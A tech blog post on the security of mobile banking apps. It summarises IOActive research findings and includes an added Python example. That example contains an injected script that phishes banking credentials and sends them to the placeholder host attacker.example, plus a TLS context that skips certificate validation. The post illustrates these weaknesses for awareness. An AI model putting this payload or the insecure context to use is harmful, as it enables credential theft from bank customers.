Mobile Banking Apps: Are We Really Safe?

I am in love with smartphone applications, or simply “apps” as most, if not all, of us refer to them. With the development these apps have had over the past couple of years, it’s safe to say that they simply make our everyday lives easier. There’s even a radio ad I heard claiming that these days “there’s always an app for everything”.

Well, thinking about it, I think it is true. Companies of all sorts from all parts of the world have created mobile apps for iOS, Android, Windows Phone and BlackBerry users, designed to reach their customers more easily in different ways. One example is banks. Banks from all over the world have created smartphone apps that let their customers check their balance or perform whatever banking transaction they need, such as paying bills, as long as those actions are also available in the web version of their bank’s eBanking service.

Yes, it is very convenient. But the question is: are we really willing to entrust the safety of our hard-earned money to the mobile applications our banks offer, when we hardly know how securely they were developed, just for the convenience of not having to go to the ATM each time we need to check our balance, or to save ourselves a trip to the bank to pay bills and whatnot, in a world where hackers and identity thieves are out there, ready to steal not just money but also personal information they can use?

Research conducted by Ariel Sanchez of IOActive Labs found that many of the mobile banking apps available for download from your smartphone’s app store are riddled with vulnerabilities, leaving both customers and banks susceptible to hacking and information theft. The research was conducted over a total of 40 non-consecutive hours, using Apple iPhone and iPad devices to test 40 mobile banking apps from 60 of the world’s top banks.

IOActive Labs Research

Although the research did not publicly disclose the specific vulnerabilities of the apps tested, it revealed that:

IOActive Labs result summary

1. Less than 20% of the apps tested have Position Independent Executable (PIE) and Stack Smashing Protection disabled, leaving them without two mitigations that reduce the risk of memory corruption attacks.

2. 40% of the apps tested do not validate the authenticity of the SSL certificate presented by the server, making them susceptible to Man-in-the-Middle (MiTM) attacks.

3. Over 50% of the apps have insecure UIWebView implementations, making them vulnerable to JavaScript injection attacks. Where native iOS functionality is exposed to the web view, an attacker can send SMS messages or even e-mails from the victim’s device without the victim knowing.

4. Almost 70% of the apps offer no alternative authentication solution, which leaves them open to impersonation attacks.

5. 90% of the apps contain non-SSL links, which lets an attacker intercept the traffic and inject arbitrary JavaScript/HTML code to create a fake log-in prompt.

6. A new form of phishing attack has also surfaced. By injecting code that prompts the user to re-enter their credentials because “the online banking session has expired”, an attacker can easily steal the user’s log-in details.
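Findings 2, 5 and 6 above are all transport-layer problems, so here is an added example (written for this post, not code from IOActive or from any bank’s app) that models them in Python: a check for the non-SSL links an on-path attacker can tamper with, the rewrite that attacker applies to a cleartext response to plant the “session expired” prompt, and the certificate-validation settings that separate a client resistant to MiTM from one that accepts any certificate. The HTML and the hostnames (bank.example, attacker.example) are constructed for the example.

```python
"""Added example: three of the IOActive findings modelled in Python.

 - find_non_tls_links():      the check behind finding 5, scanning markup an
   app loads for http:// links an on-path attacker can tamper with.
 - inject_session_expired():  what that attacker does to a plain-HTTP response
   (finding 6): plant a script that pops a fake "session expired" login prompt.
 - bank_tls_context() vs broken_tls_context(): the certificate-validation
   settings behind finding 2.

Hostnames and HTML below are constructed placeholders, not real sites.
"""
import ssl
from html.parser import HTMLParser
from urllib.parse import urlsplit


class _LinkCollector(HTMLParser):
    """Collects URLs from attributes that make the client fetch or submit."""
    URL_ATTRS = {"href", "src", "action"}

    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in self.URL_ATTRS and value:
                self.urls.append(value)


def find_non_tls_links(html):
    """Return every absolute http:// URL referenced by the markup (finding 5)."""
    collector = _LinkCollector()
    collector.feed(html)
    return [u for u in collector.urls if urlsplit(u).scheme == "http"]


# The payload an on-path attacker injects (finding 6): a fake re-login prompt
# that posts the credentials to an attacker-controlled (placeholder) host.
FAKE_LOGIN_PROMPT = (
    "<script>"
    "var u=prompt('Your online banking session has expired. Username:');"
    "var p=prompt('Password:');"
    "new Image().src='http://attacker.example/c?u='+encodeURIComponent(u)"
    "+'&p='+encodeURIComponent(p);"
    "</script>"
)


def inject_session_expired(response_body):
    """Rewrite a cleartext HTTP response the way an on-path attacker would:
    insert the phishing script just before </body>, or append it if absent.
    Only possible because the page was fetched over a non-SSL link."""
    marker = "</body>"
    idx = response_body.lower().rfind(marker)  # same offset in the original text
    if idx == -1:
        return response_body + FAKE_LOGIN_PROMPT
    return response_body[:idx] + FAKE_LOGIN_PROMPT + response_body[idx:]


def bank_tls_context():
    """Client context that rejects untrusted certificates and hostname
    mismatches: what an app must require before sending credentials."""
    ctx = ssl.create_default_context()
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def broken_tls_context():
    """The anti-pattern behind finding 2: accept any certificate, so a MiTM
    with a self-signed certificate can terminate the 'secure' session."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False        # must be cleared before verify_mode
    ctx.verify_mode = ssl.CERT_NONE   # certificate chain no longer validated
    return ctx


def validates_certificates(ctx):
    """The two settings a reviewer checks in an app's networking code."""
    return bool(ctx.check_hostname) and ctx.verify_mode == ssl.CERT_REQUIRED


# Constructed sample page: two of its four references are plain http://.
SAMPLE_PAGE = """<html><body>
<a href="https://bank.example/login">Login</a>
<img src="http://static.bank.example/logo.png">
<script src="http://cdn.example/app.js"></script>
<form action="https://bank.example/pay">...</form>
</body></html>"""


if __name__ == "__main__":
    print("non-SSL links:", find_non_tls_links(SAMPLE_PAGE))
    print("tampered page ends with:", inject_session_expired(SAMPLE_PAGE)[-120:])
    print("secure context validates:", validates_certificates(bank_tls_context()))
    print("broken context validates:", validates_certificates(broken_tls_context()))
```

Run it as a script to see the two cleartext links flagged, the injected prompt sitting just before `</body>`, and the two contexts compared. The point of the last pair is that the insecure context is only two lines away from the secure one, which is exactly why it is so common in shipped apps.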

These results are disturbing. Taken together with the data theft at Target during the Thanksgiving and Black Friday sales in November 2013, in which roughly 40 million customer cards may have been exposed, they show that everyone faces the threat of identity theft and information stealing until banks and developers make sure that their apps are secure and resistant to attack.

Personally, I use local bank apps from BPI and Unionbank and other mobile banking apps like GCash, and so far my accounts have not been compromised, and I’m hoping it stays that way. A relative of mine based in New York (and a Cebuana as well), on the other hand, went to LA last summer for a quick vacation. She tried to log in to her online account using her mobile phone for the first time to check her balance, and the next thing she knew, there were charges on her card a day later from establishments in Europe. It’s a good thing that the bank reversed the charges, since there’s no way for her to be in LA and make charges in Europe.

With this said, I can’t help but ask again: with mobile banking apps, are we really safe?

Bert Padilla

Founding Editor of Cebu Tech Blogger, where he shares insights on eCommerce, Digital Marketing, Ad Ops, Tech, Startups, Technopreneurship, Life Goals and Hacks. He’s the brainchild and ninja of a Cebu-based digital agency, TekWorx.Digital, with ventures TekWorx (eCommerce and Digital Marketing), AdWorx (Outsourced Ad Ops for Publishers) and BlogWorx (full-fledged Blog Development service).
